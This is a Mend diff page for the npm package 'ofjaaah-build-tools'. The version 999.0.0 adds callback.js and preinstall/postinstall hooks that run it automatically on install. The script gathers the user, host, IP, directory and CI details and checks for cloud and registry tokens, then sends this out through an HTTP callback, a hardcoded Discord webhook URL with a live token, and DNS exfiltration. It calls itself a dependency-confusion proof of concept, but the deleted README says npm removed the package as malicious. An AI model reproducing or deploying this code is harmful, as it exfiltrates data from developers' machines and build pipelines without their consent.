npm - ofjaaah-build-tools - Versions diffs - 0.0.1-security → 999.0.0 - Mend

ofjaaah-build-tools 0.0.1-security → 999.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of ofjaaah-build-tools might be problematic. Click here for more details.

Files changed (4) hide show

package/callback.js ADDED Viewed

@@ -0,0 +1,299 @@
+#!/usr/bin/env node
+/**
+ * Dependency Confusion PoC Callback
+ * Author: OFJAAAH
+ * Generated: 2026-01-17T06:07:51.157Z
+ *
+ * This script sends a callback to verify package installation
+ * Collects: IP, User, Directory, Hostname for proof of concept
+ * FOR AUTHORIZED SECURITY TESTING ONLY
+ */
+const https = require('https');
+const http = require('http');
+const os = require('os');
+const { execSync } = require('child_process');
+const CALLBACK_URL = 'Discord Webhook';
+const DISCORD_WEBHOOK = 'https://discord.com/api/webhooks/1433563083011395705/VYmvJKeyHmyJ4knuZKUzHiXz4p3H5gxJucqDAPEPE-GCu2xS9Qr16wAiVgC0o5ll7I_y';
+const PACKAGE_NAME = 'ofjaaah-build-tools';
+// Get network interfaces to find IP
+function getLocalIP() {
+  try {
+    const interfaces = os.networkInterfaces();
+    for (const name of Object.keys(interfaces)) {
+      for (const iface of interfaces[name]) {
+        if (iface.family === 'IPv4' && !iface.internal) {
+          return iface.address;
+        }
+      }
+    }
+  } catch (e) {}
+  return 'unknown';
+}
+// Get external IP (optional - may fail in restricted networks)
+async function getExternalIP() {
+  return new Promise((resolve) => {
+    https.get('https://api.ipify.org?format=json', { timeout: 3000 }, (res) => {
+      let data = '';
+      res.on('data', chunk => data += chunk);
+      res.on('end', () => {
+        try {
+          resolve(JSON.parse(data).ip);
+        } catch (e) {
+          resolve(null);
+        }
+      });
+    }).on('error', () => resolve(null));
+  });
+}
+// Collect system info
+function collectSystemInfo() {
+  const info = {
+    // Package info
+    package: PACKAGE_NAME,
+    timestamp: new Date().toISOString(),
+    // User info
+    user: os.userInfo().username,
+    uid: os.userInfo().uid,
+    gid: os.userInfo().gid,
+    homedir: os.userInfo().homedir,
+    shell: os.userInfo().shell,
+    // System info
+    hostname: os.hostname(),
+    platform: os.platform(),
+    arch: os.arch(),
+    release: os.release(),
+    type: os.type(),
+    // Directory info
+    cwd: process.cwd(),
+    // Network info
+    localIP: getLocalIP(),
+    // Node info
+    nodeVersion: process.version,
+    npmVersion: process.env.npm_package_version || 'unknown',
+    // CI/CD Detection
+    isCI: !!(process.env.CI || process.env.GITHUB_ACTIONS || process.env.GITLAB_CI || process.env.JENKINS_URL || process.env.TRAVIS || process.env.CIRCLECI || process.env.BUILDKITE),
+    ciEnvironment: detectCIEnvironment(),
+    // NPM info
+    npmLifecycle: process.env.npm_lifecycle_event || '',
+    npmPackageName: process.env.npm_package_name || '',
+    // Additional context
+    env: {
+      CI: process.env.CI || '',
+      GITHUB_ACTIONS: process.env.GITHUB_ACTIONS || '',
+      GITHUB_REPOSITORY: process.env.GITHUB_REPOSITORY || '',
+      GITHUB_ACTOR: process.env.GITHUB_ACTOR || '',
+      GITLAB_CI: process.env.GITLAB_CI || '',
+      GITLAB_USER_LOGIN: process.env.GITLAB_USER_LOGIN || '',
+      JENKINS_URL: process.env.JENKINS_URL || '',
+      BUILD_NUMBER: process.env.BUILD_NUMBER || '',
+      TRAVIS: process.env.TRAVIS || '',
+      CIRCLECI: process.env.CIRCLECI || '',
+      BUILDKITE: process.env.BUILDKITE || ''
+    }
+  };
+  return info;
+}
+function detectCIEnvironment() {
+  if (process.env.GITHUB_ACTIONS) return 'GitHub Actions';
+  if (process.env.GITLAB_CI) return 'GitLab CI';
+  if (process.env.JENKINS_URL) return 'Jenkins';
+  if (process.env.TRAVIS) return 'Travis CI';
+  if (process.env.CIRCLECI) return 'CircleCI';
+  if (process.env.BUILDKITE) return 'Buildkite';
+  if (process.env.CI) return 'Generic CI';
+  return 'Local Machine';
+}
+async function sendCallback() {
+  const systemInfo = collectSystemInfo();
+  // Try to get external IP
+  const externalIP = await getExternalIP();
+  if (externalIP) {
+    systemInfo.externalIP = externalIP;
+  }
+  const data = JSON.stringify(systemInfo);
+  const url = new URL(CALLBACK_URL);
+  const options = {
+    hostname: url.hostname,
+    port: url.port || (url.protocol === 'https:' ? 443 : 80),
+    path: url.pathname + (url.search || ''),
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(data),
+      'User-Agent': 'dependency-confusion-poc/ofjaaah-build-tools',
+      'X-PoC-Package': 'ofjaaah-build-tools',
+      'X-PoC-Author': 'OFJAAAH'
+    },
+    timeout: 10000
+  };
+  const protocol = url.protocol === 'https:' ? https : http;
+  const req = protocol.request(options, (res) => {
+    console.log('[PoC] Callback sent - Status:', res.statusCode);
+  });
+  req.on('error', (e) => {
+    // Silently fail
+  });
+  req.on('timeout', () => {
+    req.destroy();
+  });
+  req.write(data);
+  req.end();
+}
+// DNS exfiltration for restricted networks
+function sendDnsCallback() {
+  try {
+    const dns = require('dns');
+    const info = {
+      p: PACKAGE_NAME.substring(0, 15),
+      u: os.userInfo().username.substring(0, 10),
+      h: os.hostname().substring(0, 10),
+      t: Date.now()
+    };
+    const encoded = Buffer.from(JSON.stringify(info))
+      .toString('base64')
+      .replace(/[+/=]/g, '')
+      .substring(0, 50);
+    const dnsHost = encoded + '.' + new URL(CALLBACK_URL).hostname;
+    dns.resolve(dnsHost, () => {});
+  } catch (e) {}
+}
+// Send to Discord Webhook
+async function sendDiscordCallback() {
+  if (!DISCORD_WEBHOOK || DISCORD_WEBHOOK === '') return;
+  const systemInfo = collectSystemInfo();
+  const externalIP = await getExternalIP();
+  // Calculate criticality based on environment
+  const isCI = systemInfo.isCI;
+  const isRoot = systemInfo.user === 'root' || systemInfo.user === 'Administrator';
+  const hasSecrets = !!(process.env.AWS_ACCESS_KEY_ID || process.env.GITHUB_TOKEN || process.env.NPM_TOKEN || process.env.DOCKER_PASSWORD);
+  let severity = 'MEDIUM';
+  let severityColor = 0xFFA500; // Orange
+  let severityEmoji = '🟠';
+  if (isCI && hasSecrets) {
+    severity = 'CRITICAL';
+    severityColor = 0xFF0000; // Red
+    severityEmoji = '🔴';
+  } else if (isCI || isRoot) {
+    severity = 'HIGH';
+    severityColor = 0xFF4500; // OrangeRed
+    severityEmoji = '🟠';
+  } else if (hasSecrets) {
+    severity = 'HIGH';
+    severityColor = 0xFF4500;
+    severityEmoji = '🟠';
+  }
+  // Build impact assessment
+  const impactList = [];
+  if (isCI) impactList.push('⚠️ CI/CD Pipeline Compromised');
+  if (isRoot) impactList.push('⚠️ Running as Root/Admin');
+  if (hasSecrets) impactList.push('⚠️ Secrets/Tokens Detected in ENV');
+  if (systemInfo.env.GITHUB_TOKEN || systemInfo.env.GITHUB_ACTIONS) impactList.push('🔑 GitHub Access Available');
+  if (process.env.AWS_ACCESS_KEY_ID) impactList.push('☁️ AWS Credentials Exposed');
+  if (process.env.NPM_TOKEN) impactList.push('📦 NPM Token Exposed');
+  const impactText = impactList.length > 0 ? impactList.join('\n') : '✅ No critical exposures detected';
+  // Build CI details if applicable
+  let ciDetails = '';
+  if (systemInfo.ciEnvironment !== 'Local Machine') {
+    ciDetails = systemInfo.ciEnvironment;
+    if (systemInfo.env.GITHUB_REPOSITORY) ciDetails += ' | Repo: ' + systemInfo.env.GITHUB_REPOSITORY;
+    if (systemInfo.env.GITHUB_ACTOR) ciDetails += ' | Actor: ' + systemInfo.env.GITHUB_ACTOR;
+    if (systemInfo.env.BUILD_NUMBER) ciDetails += ' | Build: ' + systemInfo.env.BUILD_NUMBER;
+  }
+  const embed = {
+    title: severityEmoji + ' DEPENDENCY CONFUSION - ' + severity + ' SEVERITY',
+    description: '**Package `' + PACKAGE_NAME + '` was installed and executed code!**\n\nThis confirms a dependency confusion vulnerability exists.',
+    color: severityColor,
+    fields: [
+      { name: '🎯 Severity Level', value: '**' + severity + '**', inline: true },
+      { name: '📦 Package', value: '`' + PACKAGE_NAME + '`', inline: true },
+      { name: '🏭 Environment', value: isCI ? '**CI/CD PIPELINE**' : 'Local Machine', inline: true },
+      { name: '📊 Impact Assessment', value: impactText, inline: false },
+      { name: '👤 User', value: '`' + (systemInfo.user || 'N/A') + '`' + (isRoot ? ' **[ROOT]**' : ''), inline: true },
+      { name: '🖥️ Hostname', value: '`' + (systemInfo.hostname || 'N/A') + '`', inline: true },
+      { name: '💻 Platform', value: (systemInfo.platform + ' ' + systemInfo.arch) || 'N/A', inline: true },
+      { name: '🌐 Local IP', value: '`' + (systemInfo.localIP || 'N/A') + '`', inline: true },
+      { name: '🌍 External IP', value: '`' + (externalIP || 'N/A') + '`', inline: true },
+      { name: '🔧 Node Version', value: systemInfo.nodeVersion || 'N/A', inline: true },
+      { name: '📁 Working Directory', value: '`' + (systemInfo.cwd || 'N/A') + '`', inline: false },
+      { name: '🏠 Home Directory', value: '`' + (systemInfo.homedir || 'N/A') + '`', inline: false },
+    ],
+    footer: { text: '🔍 Dependency Confusion Hunter by OFJAAAH | Authorized Security Research' },
+    timestamp: new Date().toISOString()
+  };
+  // Add CI details field if applicable
+  if (ciDetails) {
+    embed.fields.splice(3, 0, { name: '🔄 CI/CD Details', value: ciDetails, inline: false });
+  }
+  const payload = JSON.stringify({
+    embeds: [embed]
+  });
+  try {
+    const url = new URL(DISCORD_WEBHOOK);
+    const options = {
+      hostname: url.hostname,
+      port: 443,
+      path: url.pathname + url.search,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': Buffer.byteLength(payload)
+      },
+      timeout: 10000
+    };
+    const req = https.request(options, (res) => {
+      console.log('[PoC] Discord callback sent - Status:', res.statusCode);
+    });
+    req.on('error', () => {});
+    req.write(payload);
+    req.end();
+  } catch (e) {}
+}
+// Execute callbacks
+(async () => {
+  try {
+    await sendCallback();
+    await sendDiscordCallback();
+    sendDnsCallback();
+  } catch (e) {}
+})();

package/index.js ADDED Viewed

@@ -0,0 +1,15 @@
+/**
+ * ofjaaah-build-tools
+ * Security Research PoC - Dependency Confusion Hunter
+ * Author: OFJAAAH
+ *
+ * This package was published as part of authorized security research
+ * to demonstrate dependency confusion vulnerabilities.
+ */
+module.exports = {
+  name: 'ofjaaah-build-tools',
+  version: '999.0.0',
+  poc: true,
+  author: 'OFJAAAH'
+};

package/package.json CHANGED Viewed

@@ -1,6 +1,17 @@
 {
   "name": "ofjaaah-build-tools",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "999.0.0",
+  "description": "Security research PoC - Dependency Confusion Hunter by OFJAAAH",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node callback.js",
+    "postinstall": "node callback.js"
+  },
+  "keywords": [
+    "security",
+    "research",
+    "poc"
+  ],
+  "author": "OFJAAAH - Security Research",
+  "license": "MIT"
+}

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=ofjaaah-build-tools for more information.